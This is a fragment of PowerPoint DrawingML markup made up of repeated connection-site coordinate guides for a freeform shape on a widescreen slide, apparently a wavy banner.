              <a:gd name="connsiteX146" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 5952585 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 161012 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 6001964 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 154786 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 6184207 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 132658 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX161" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY161"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256213 w 12192000"/>
              <a:gd name="connsiteY51" fmla="*/ 281576 h 4939827"/>
              <a:gd name="connsiteX52" fmla="*/ 9371484 w 12192000"/>
              <a:gd name="connsiteY52" fmla="*/ 329634 h 4939827"/>
              <a:gd name="connsiteX53" fmla="*/ 9404829 w 12192000"/>
              <a:gd name="connsiteY53" fmla="*/ 339038 h 4939827"/>
              <a:gd name="connsiteX54" fmla="*/ 9427021 w 12192000"/>
              <a:gd name="connsiteY54" fmla="*/ 358784 h 4939827"/>
              <a:gd name="connsiteX55" fmla="*/ 9670844 w 12192000"/>
              <a:gd name="connsiteY55" fmla="*/ 405128 h 4939827"/>
              <a:gd name="connsiteX56" fmla="*/ 9816083 w 12192000"/>
              <a:gd name="connsiteY56" fmla="*/ 416573 h 4939827"/>
              <a:gd name="connsiteX57" fmla="*/ 9936741 w 12192000"/>
              <a:gd name="connsiteY57" fmla="*/ 437044 h 4939827"/>
              <a:gd name="connsiteX58" fmla="*/ 10050093 w 12192000"/>
              <a:gd name="connsiteY58" fmla="*/ 443783 h 4939827"/>
              <a:gd name="connsiteX59" fmla="*/ 10130090 w 12192000"/>
              <a:gd name="connsiteY59" fmla="*/ 459520 h 4939827"/>
              <a:gd name="connsiteX60" fmla="*/ 10173456 w 12192000"/>
              <a:gd name="connsiteY60" fmla="*/ 457749 h 4939827"/>
              <a:gd name="connsiteX61" fmla="*/ 10218232 w 12192000"/>
              <a:gd name="connsiteY61" fmla="*/ 459820 h 4939827"/>
              <a:gd name="connsiteX62" fmla="*/ 10354176 w 12192000"/>
              <a:gd name="connsiteY62" fmla="*/ 471377 h 4939827"/>
              <a:gd name="connsiteX63" fmla="*/ 10430681 w 12192000"/>
              <a:gd name="connsiteY63" fmla="*/ 481226 h 4939827"/>
              <a:gd name="connsiteX64" fmla="*/ 10478169 w 12192000"/>
              <a:gd name="connsiteY64" fmla="*/ 481774 h 4939827"/>
              <a:gd name="connsiteX65" fmla="*/ 10540907 w 12192000"/>
              <a:gd name="connsiteY65" fmla="*/ 485607 h 4939827"/>
              <a:gd name="connsiteX66" fmla="*/ 10614941 w 12192000"/>
              <a:gd name="connsiteY66" fmla="*/ 487592 h 4939827"/>
              <a:gd name="connsiteX67" fmla="*/ 10674098 w 12192000"/>
              <a:gd name="connsiteY67" fmla="*/ 521656 h 4939827"/>
              <a:gd name="connsiteX68" fmla="*/ 10874834 w 12192000"/>
              <a:gd name="connsiteY68" fmla="*/ 574867 h 4939827"/>
              <a:gd name="connsiteX69" fmla="*/ 10944981 w 12192000"/>
              <a:gd name="connsiteY69" fmla="*/ 615042 h 4939827"/>
              <a:gd name="connsiteX70" fmla="*/ 11006376 w 12192000"/>
              <a:gd name="connsiteY70" fmla="*/ 645957 h 4939827"/>
              <a:gd name="connsiteX71" fmla="*/ 11076308 w 12192000"/>
              <a:gd name="connsiteY71" fmla="*/ 675698 h 4939827"/>
              <a:gd name="connsiteX72" fmla="*/ 11148789 w 12192000"/>
              <a:gd name="connsiteY72" fmla="*/ 685041 h 4939827"/>
              <a:gd name="connsiteX73" fmla="*/ 11249129 w 12192000"/>
              <a:gd name="connsiteY73" fmla="*/ 684218 h 4939827"/>
              <a:gd name="connsiteX74" fmla="*/ 11299915 w 12192000"/>
              <a:gd name="connsiteY74" fmla="*/ 692177 h 4939827"/>
              <a:gd name="connsiteX75" fmla="*/ 11386973 w 12192000"/>
              <a:gd name="connsiteY75" fmla="*/ 708209 h 4939827"/>
              <a:gd name="connsiteX76" fmla="*/ 11500105 w 12192000"/>
              <a:gd name="connsiteY76" fmla="*/ 735014 h 4939827"/>
              <a:gd name="connsiteX77" fmla="*/ 11621735 w 12192000"/>
              <a:gd name="connsiteY77" fmla="*/ 789584 h 4939827"/>
              <a:gd name="connsiteX78" fmla="*/ 11691200 w 12192000"/>
              <a:gd name="connsiteY78" fmla="*/ 867902 h 4939827"/>
              <a:gd name="connsiteX79" fmla="*/ 11819427 w 12192000"/>
              <a:gd name="connsiteY79" fmla="*/ 911634 h 4939827"/>
              <a:gd name="connsiteX80" fmla="*/ 11969720 w 12192000"/>
              <a:gd name="connsiteY80" fmla="*/ 964737 h 4939827"/>
              <a:gd name="connsiteX81" fmla="*/ 12055766 w 12192000"/>
              <a:gd name="connsiteY81" fmla="*/ 991268 h 4939827"/>
              <a:gd name="connsiteX82" fmla="*/ 12171539 w 12192000"/>
              <a:gd name="connsiteY82" fmla="*/ 995427 h 4939827"/>
              <a:gd name="connsiteX83" fmla="*/ 12187831 w 12192000"/>
              <a:gd name="connsiteY83" fmla="*/ 996580 h 4939827"/>
              <a:gd name="connsiteX84" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY84" fmla="*/ 996726 h 4939827"/>
              <a:gd name="connsiteX85" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY85" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX86" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY86" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX87" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY87" fmla="*/ 512043 h 4939827"/>
              <a:gd name="connsiteX88" fmla="*/ 7381 w 12192000"/>
              <a:gd name="connsiteY88" fmla="*/ 512580 h 4939827"/>
              <a:gd name="connsiteX89" fmla="*/ 100029 w 12192000"/>
              <a:gd name="connsiteY89" fmla="*/ 504758 h 4939827"/>
              <a:gd name="connsiteX90" fmla="*/ 155244 w 12192000"/>
              <a:gd name="connsiteY90" fmla="*/ 525130 h 4939827"/>
              <a:gd name="connsiteX91" fmla="*/ 254366 w 12192000"/>
              <a:gd name="connsiteY91" fmla="*/ 534449 h 4939827"/>
              <a:gd name="connsiteX92" fmla="*/ 447292 w 12192000"/>
              <a:gd name="connsiteY92" fmla="*/ 542725 h 4939827"/>
              <a:gd name="connsiteX93" fmla="*/ 628105 w 12192000"/>
              <a:gd name="connsiteY93" fmla="*/ 547853 h 4939827"/>
              <a:gd name="connsiteX94" fmla="*/ 783146 w 12192000"/>
              <a:gd name="connsiteY94" fmla="*/ 591799 h 4939827"/>
              <a:gd name="connsiteX95" fmla="*/ 1043676 w 12192000"/>
              <a:gd name="connsiteY95" fmla="*/ 591887 h 4939827"/>
              <a:gd name="connsiteX96" fmla="*/ 1281816 w 12192000"/>
              <a:gd name="connsiteY96" fmla="*/ 520946 h 4939827"/>
              <a:gd name="connsiteX97" fmla="*/ 1486347 w 12192000"/>
              <a:gd name="connsiteY97" fmla="*/ 487310 h 4939827"/>
              <a:gd name="connsiteX98" fmla="*/ 1568079 w 12192000"/>
              <a:gd name="connsiteY98" fmla="*/ 462531 h 4939827"/>
              <a:gd name="connsiteX99" fmla="*/ 1622516 w 12192000"/>
              <a:gd name="connsiteY99" fmla="*/ 466058 h 4939827"/>
              <a:gd name="connsiteX100" fmla="*/ 1655457 w 12192000"/>
              <a:gd name="connsiteY100" fmla="*/ 465359 h 4939827"/>
              <a:gd name="connsiteX101" fmla="*/ 1717454 w 12192000"/>
              <a:gd name="connsiteY101" fmla="*/ 417203 h 4939827"/>
              <a:gd name="connsiteX102" fmla="*/ 1913794 w 12192000"/>
              <a:gd name="connsiteY102" fmla="*/ 365255 h 4939827"/>
              <a:gd name="connsiteX103" fmla="*/ 2129762 w 12192000"/>
              <a:gd name="connsiteY103" fmla="*/ 367832 h 4939827"/>
              <a:gd name="connsiteX104" fmla="*/ 2376970 w 12192000"/>
              <a:gd name="connsiteY104" fmla="*/ 350129 h 4939827"/>
              <a:gd name="connsiteX105" fmla="*/ 2480155 w 12192000"/>
              <a:gd name="connsiteY105" fmla="*/ 359227 h 4939827"/>
              <a:gd name="connsiteX106" fmla="*/ 2586782 w 12192000"/>
              <a:gd name="connsiteY106" fmla="*/ 339352 h 4939827"/>
              <a:gd name="connsiteX107" fmla="*/ 2679617 w 12192000"/>
              <a:gd name="connsiteY107" fmla="*/ 305383 h 4939827"/>
              <a:gd name="connsiteX108" fmla="*/ 2788947 w 12192000"/>
              <a:gd name="connsiteY108" fmla="*/ 250375 h 4939827"/>
              <a:gd name="connsiteX109" fmla="*/ 2965530 w 12192000"/>
              <a:gd name="connsiteY109" fmla="*/ 245958 h 4939827"/>
              <a:gd name="connsiteX110" fmla="*/ 3103677 w 12192000"/>
              <a:gd name="connsiteY110" fmla="*/ 209527 h 4939827"/>
              <a:gd name="connsiteX111" fmla="*/ 3126759 w 12192000"/>
              <a:gd name="connsiteY111" fmla="*/ 211226 h 4939827"/>
              <a:gd name="connsiteX112" fmla="*/ 3164020 w 12192000"/>
              <a:gd name="connsiteY112" fmla="*/ 212779 h 4939827"/>
              <a:gd name="connsiteX113" fmla="*/ 3285019 w 12192000"/>
              <a:gd name="connsiteY113" fmla="*/ 220535 h 4939827"/>
              <a:gd name="connsiteX114" fmla="*/ 3365154 w 12192000"/>
              <a:gd name="connsiteY114" fmla="*/ 226416 h 4939827"/>
              <a:gd name="connsiteX115" fmla="*/ 3367507 w 12192000"/>
              <a:gd name="connsiteY115" fmla="*/ 225416 h 4939827"/>
              <a:gd name="connsiteX116" fmla="*/ 3387567 w 12192000"/>
              <a:gd name="connsiteY116" fmla="*/ 227103 h 4939827"/>
              <a:gd name="connsiteX117" fmla="*/ 3498001 w 12192000"/>
              <a:gd name="connsiteY117" fmla="*/ 231941 h 4939827"/>
              <a:gd name="connsiteX118" fmla="*/ 3561557 w 12192000"/>
              <a:gd name="connsiteY118" fmla="*/ 228095 h 4939827"/>
              <a:gd name="connsiteX119" fmla="*/ 3611920 w 12192000"/>
              <a:gd name="connsiteY119" fmla="*/ 218094 h 4939827"/>
              <a:gd name="connsiteX120" fmla="*/ 3620528 w 12192000"/>
              <a:gd name="connsiteY120" fmla="*/ 218788 h 4939827"/>
              <a:gd name="connsiteX121" fmla="*/ 3620766 w 12192000"/>
              <a:gd name="connsiteY121" fmla="*/ 218511 h 4939827"/>
              <a:gd name="connsiteX122" fmla="*/ 3629977 w 12192000"/>
              <a:gd name="connsiteY122" fmla="*/ 218664 h 4939827"/>
              <a:gd name="connsiteX123" fmla="*/ 3636217 w 12192000"/>
              <a:gd name="connsiteY123" fmla="*/ 220048 h 4939827"/>
              <a:gd name="connsiteX124" fmla="*/ 3709484 w 12192000"/>
              <a:gd name="connsiteY124" fmla="*/ 186927 h 4939827"/>
              <a:gd name="connsiteX125" fmla="*/ 3761342 w 12192000"/>
              <a:gd name="connsiteY125" fmla="*/ 177474 h 4939827"/>
              <a:gd name="connsiteX126" fmla="*/ 3799748 w 12192000"/>
              <a:gd name="connsiteY126" fmla="*/ 167154 h 4939827"/>
              <a:gd name="connsiteX127" fmla="*/ 3922756 w 12192000"/>
              <a:gd name="connsiteY127" fmla="*/ 194044 h 4939827"/>
              <a:gd name="connsiteX128" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY128" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX129" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY129" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX130" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY130" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX131" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY131" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX132" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY132" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX133" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY133" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX134" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY134" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX135" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX136" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 156458 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 5952585 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 161012 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 6001964 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 154786 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 6184207 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 132658 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY160"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33396 w 12192000"/>
              <a:gd name="connsiteY50" fmla="*/ 274803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586687 w 12192000"/>
              <a:gd name="connsiteY30" fmla="*/ 264089 h 4939827"/>
              <a:gd name="connsiteX31" fmla="*/ 8672650 w 12192000"/>
              <a:gd name="connsiteY31" fmla="*/ 254821 h 4939827"/>
              <a:gd name="connsiteX32" fmla="*/ 8785543 w 12192000"/>
              <a:gd name="connsiteY32" fmla="*/ 263406 h 4939827"/>
              <a:gd name="connsiteX33" fmla="*/ 8830588 w 12192000"/>
              <a:gd name="connsiteY33" fmla="*/ 265483 h 4939827"/>
              <a:gd name="connsiteX34" fmla="*/ 8905142 w 12192000"/>
              <a:gd name="connsiteY34" fmla="*/ 264958 h 4939827"/>
              <a:gd name="connsiteX35" fmla="*/ 8968582 w 12192000"/>
              <a:gd name="connsiteY35" fmla="*/ 262728 h 4939827"/>
              <a:gd name="connsiteX36" fmla="*/ 8972994 w 12192000"/>
              <a:gd name="connsiteY36" fmla="*/ 263284 h 4939827"/>
              <a:gd name="connsiteX37" fmla="*/ 9004605 w 12192000"/>
              <a:gd name="connsiteY37" fmla="*/ 258041 h 4939827"/>
              <a:gd name="connsiteX38" fmla="*/ 9016165 w 12192000"/>
              <a:gd name="connsiteY38" fmla="*/ 261258 h 4939827"/>
              <a:gd name="connsiteX39" fmla="*/ 9043297 w 12192000"/>
              <a:gd name="connsiteY39" fmla="*/ 281547 h 4939827"/>
              <a:gd name="connsiteX40" fmla="*/ 9048315 w 12192000"/>
              <a:gd name="connsiteY40" fmla="*/ 279264 h 4939827"/>
              <a:gd name="connsiteX41" fmla="*/ 9054706 w 12192000"/>
              <a:gd name="connsiteY41" fmla="*/ 278538 h 4939827"/>
              <a:gd name="connsiteX42" fmla="*/ 9070919 w 12192000"/>
              <a:gd name="connsiteY42" fmla="*/ 281810 h 4939827"/>
              <a:gd name="connsiteX43" fmla="*/ 9076813 w 12192000"/>
              <a:gd name="connsiteY43" fmla="*/ 283909 h 4939827"/>
              <a:gd name="connsiteX44" fmla="*/ 9085871 w 12192000"/>
              <a:gd name="connsiteY44" fmla="*/ 285133 h 4939827"/>
              <a:gd name="connsiteX45" fmla="*/ 9086159 w 12192000"/>
              <a:gd name="connsiteY45" fmla="*/ 284887 h 4939827"/>
              <a:gd name="connsiteX46" fmla="*/ 9134606 w 12192000"/>
              <a:gd name="connsiteY46" fmla="*/ 288168 h 4939827"/>
              <a:gd name="connsiteX47" fmla="*/ 9195590 w 12192000"/>
              <a:gd name="connsiteY47" fmla="*/ 279568 h 4939827"/>
              <a:gd name="connsiteX48" fmla="*/ 9219336 w 12192000"/>
              <a:gd name="connsiteY48" fmla="*/ 278133 h 4939827"/>
              <a:gd name="connsiteX49" fmla="*/ 9232362 w 12192000"/>
              <a:gd name="connsiteY49" fmla="*/ 275894 h 4939827"/>
              <a:gd name="connsiteX50" fmla="*/ 9283638 w 12192000"/>
              <a:gd name="connsiteY50" fmla="*/ 299924 h 4939827"/>
              <a:gd name="connsiteX51" fmla="*/ 9371484 w 12192000"/>
              <a:gd name="connsiteY51" fmla="*/ 329634 h 4939827"/>
              <a:gd name="connsiteX52" fmla="*/ 9404829 w 12192000"/>
              <a:gd name="connsiteY52" fmla="*/ 339038 h 4939827"/>
              <a:gd name="connsiteX53" fmla="*/ 9427021 w 12192000"/>
              <a:gd name="connsiteY53" fmla="*/ 358784 h 4939827"/>
              <a:gd name="connsiteX54" fmla="*/ 9670844 w 12192000"/>
              <a:gd name="connsiteY54" fmla="*/ 405128 h 4939827"/>
              <a:gd name="connsiteX55" fmla="*/ 9816083 w 12192000"/>
              <a:gd name="connsiteY55" fmla="*/ 416573 h 4939827"/>
              <a:gd name="connsiteX56" fmla="*/ 9936741 w 12192000"/>
              <a:gd name="connsiteY56" fmla="*/ 437044 h 4939827"/>
              <a:gd name="connsiteX57" fmla="*/ 10050093 w 12192000"/>
              <a:gd name="connsiteY57" fmla="*/ 443783 h 4939827"/>
              <a:gd name="connsiteX58" fmla="*/ 10130090 w 12192000"/>
              <a:gd name="connsiteY58" fmla="*/ 459520 h 4939827"/>
              <a:gd name="connsiteX59" fmla="*/ 10173456 w 12192000"/>
              <a:gd name="connsiteY59" fmla="*/ 457749 h 4939827"/>
              <a:gd name="connsiteX60" fmla="*/ 10218232 w 12192000"/>
              <a:gd name="connsiteY60" fmla="*/ 459820 h 4939827"/>
              <a:gd name="connsiteX61" fmla="*/ 10354176 w 12192000"/>
              <a:gd name="connsiteY61" fmla="*/ 471377 h 4939827"/>
              <a:gd name="connsiteX62" fmla="*/ 10430681 w 12192000"/>
              <a:gd name="connsiteY62" fmla="*/ 481226 h 4939827"/>
              <a:gd name="connsiteX63" fmla="*/ 10478169 w 12192000"/>
              <a:gd name="connsiteY63" fmla="*/ 481774 h 4939827"/>
              <a:gd name="connsiteX64" fmla="*/ 10540907 w 12192000"/>
              <a:gd name="connsiteY64" fmla="*/ 485607 h 4939827"/>
              <a:gd name="connsiteX65" fmla="*/ 10614941 w 12192000"/>
              <a:gd name="connsiteY65" fmla="*/ 487592 h 4939827"/>
              <a:gd name="connsiteX66" fmla="*/ 10674098 w 12192000"/>
              <a:gd name="connsiteY66" fmla="*/ 521656 h 4939827"/>
              <a:gd name="connsiteX67" fmla="*/ 10874834 w 12192000"/>
              <a:gd name="connsiteY67" fmla="*/ 574867 h 4939827"/>
              <a:gd name="connsiteX68" fmla="*/ 10944981 w 12192000"/>
              <a:gd name="connsiteY68" fmla="*/ 615042 h 4939827"/>
              <a:gd name="connsiteX69" fmla="*/ 11006376 w 12192000"/>
              <a:gd name="connsiteY69" fmla="*/ 645957 h 4939827"/>
              <a:gd name="connsiteX70" fmla="*/ 11076308 w 12192000"/>
              <a:gd name="connsiteY70" fmla="*/ 675698 h 4939827"/>
              <a:gd name="connsiteX71" fmla="*/ 11148789 w 12192000"/>
              <a:gd name="connsiteY71" fmla="*/ 685041 h 4939827"/>
              <a:gd name="connsiteX72" fmla="*/ 11249129 w 12192000"/>
              <a:gd name="connsiteY72" fmla="*/ 684218 h 4939827"/>
              <a:gd name="connsiteX73" fmla="*/ 11299915 w 12192000"/>
              <a:gd name="connsiteY73" fmla="*/ 692177 h 4939827"/>
              <a:gd name="connsiteX74" fmla="*/ 11386973 w 12192000"/>
              <a:gd name="connsiteY74" fmla="*/ 708209 h 4939827"/>
              <a:gd name="connsiteX75" fmla="*/ 11500105 w 12192000"/>
              <a:gd name="connsiteY75" fmla="*/ 735014 h 4939827"/>
              <a:gd name="connsiteX76" fmla="*/ 11621735 w 12192000"/>
              <a:gd name="connsiteY76" fmla="*/ 789584 h 4939827"/>
              <a:gd name="connsiteX77" fmla="*/ 11691200 w 12192000"/>
              <a:gd name="connsiteY77" fmla="*/ 867902 h 4939827"/>
              <a:gd name="connsiteX78" fmla="*/ 11819427 w 12192000"/>
              <a:gd name="connsiteY78" fmla="*/ 911634 h 4939827"/>
              <a:gd name="connsiteX79" fmla="*/ 11969720 w 12192000"/>
              <a:gd name="connsiteY79" fmla="*/ 964737 h 4939827"/>
              <a:gd name="connsiteX80" fmla="*/ 12055766 w 12192000"/>
              <a:gd name="connsiteY80" fmla="*/ 991268 h 4939827"/>
              <a:gd name="connsiteX81" fmla="*/ 12171539 w 12192000"/>
              <a:gd name="connsiteY81" fmla="*/ 995427 h 4939827"/>
              <a:gd name="connsiteX82" fmla="*/ 12187831 w 12192000"/>
              <a:gd name="connsiteY82" fmla="*/ 996580 h 4939827"/>
              <a:gd name="connsiteX83" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY83" fmla="*/ 996726 h 4939827"/>
              <a:gd name="connsiteX84" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY84" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX85" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY85" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX86" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY86" fmla="*/ 512043 h 4939827"/>
              <a:gd name="connsiteX87" fmla="*/ 7381 w 12192000"/>
              <a:gd name="connsiteY87" fmla="*/ 512580 h 4939827"/>
              <a:gd name="connsiteX88" fmla="*/ 100029 w 12192000"/>
              <a:gd name="connsiteY88" fmla="*/ 504758 h 4939827"/>
              <a:gd name="connsiteX89" fmla="*/ 155244 w 12192000"/>
              <a:gd name="connsiteY89" fmla="*/ 525130 h 4939827"/>
              <a:gd name="connsiteX90" fmla="*/ 254366 w 12192000"/>
              <a:gd name="connsiteY90" fmla="*/ 534449 h 4939827"/>
              <a:gd name="connsiteX91" fmla="*/ 447292 w 12192000"/>
              <a:gd name="connsiteY91" fmla="*/ 542725 h 4939827"/>
              <a:gd name="connsiteX92" fmla="*/ 628105 w 12192000"/>
              <a:gd name="connsiteY92" fmla="*/ 547853 h 4939827"/>
              <a:gd name="connsiteX93" fmla="*/ 783146 w 12192000"/>
              <a:gd name="connsiteY93" fmla="*/ 591799 h 4939827"/>
              <a:gd name="connsiteX94" fmla="*/ 1043676 w 12192000"/>
              <a:gd name="connsiteY94" fmla="*/ 591887 h 4939827"/>
              <a:gd name="connsiteX95" fmla="*/ 1281816 w 12192000"/>
              <a:gd name="connsiteY95" fmla="*/ 520946 h 4939827"/>
              <a:gd name="connsiteX96" fmla="*/ 1486347 w 12192000"/>
              <a:gd name="connsiteY96" fmla="*/ 487310 h 4939827"/>
              <a:gd name="connsiteX97" fmla="*/ 1568079 w 12192000"/>
              <a:gd name="connsiteY97" fmla="*/ 462531 h 4939827"/>
              <a:gd name="connsiteX98" fmla="*/ 1622516 w 12192000"/>
              <a:gd name="connsiteY98" fmla="*/ 466058 h 4939827"/>
              <a:gd name="connsiteX99" fmla="*/ 1655457 w 12192000"/>
              <a:gd name="connsiteY99" fmla="*/ 465359 h 4939827"/>
              <a:gd name="connsiteX100" fmla="*/ 1717454 w 12192000"/>
              <a:gd name="connsiteY100" fmla="*/ 417203 h 4939827"/>
              <a:gd name="connsiteX101" fmla="*/ 1913794 w 12192000"/>
              <a:gd name="connsiteY101" fmla="*/ 365255 h 4939827"/>
              <a:gd name="connsiteX102" fmla="*/ 2129762 w 12192000"/>
              <a:gd name="connsiteY102" fmla="*/ 367832 h 4939827"/>
              <a:gd name="connsiteX103" fmla="*/ 2376970 w 12192000"/>
              <a:gd name="connsiteY103" fmla="*/ 350129 h 4939827"/>
              <a:gd name="connsiteX104" fmla="*/ 2480155 w 12192000"/>
              <a:gd name="connsiteY104" fmla="*/ 359227 h 4939827"/>
              <a:gd name="connsiteX105" fmla="*/ 2586782 w 12192000"/>
              <a:gd name="connsiteY105" fmla="*/ 339352 h 4939827"/>
              <a:gd name="connsiteX106" fmla="*/ 2679617 w 12192000"/>
              <a:gd name="connsiteY106" fmla="*/ 305383 h 4939827"/>
              <a:gd name="connsiteX107" fmla="*/ 2788947 w 12192000"/>
              <a:gd name="connsiteY107" fmla="*/ 250375 h 4939827"/>
              <a:gd name="connsiteX108" fmla="*/ 2965530 w 12192000"/>
              <a:gd name="connsiteY108" fmla="*/ 245958 h 4939827"/>
              <a:gd name="connsiteX109" fmla="*/ 3103677 w 12192000"/>
              <a:gd name="connsiteY109" fmla="*/ 209527 h 4939827"/>
              <a:gd name="connsiteX110" fmla="*/ 3126759 w 12192000"/>
              <a:gd name="connsiteY110" fmla="*/ 211226 h 4939827"/>
              <a:gd name="connsiteX111" fmla="*/ 3164020 w 12192000"/>
              <a:gd name="connsiteY111" fmla="*/ 212779 h 4939827"/>
              <a:gd name="connsiteX112" fmla="*/ 3285019 w 12192000"/>
              <a:gd name="connsiteY112" fmla="*/ 220535 h 4939827"/>
              <a:gd name="connsiteX113" fmla="*/ 3365154 w 12192000"/>
              <a:gd name="connsiteY113" fmla="*/ 226416 h 4939827"/>
              <a:gd name="connsiteX114" fmla="*/ 3367507 w 12192000"/>
              <a:gd name="connsiteY114" fmla="*/ 225416 h 4939827"/>
              <a:gd name="connsiteX115" fmla="*/ 3387567 w 12192000"/>
              <a:gd name="connsiteY115" fmla="*/ 227103 h 4939827"/>
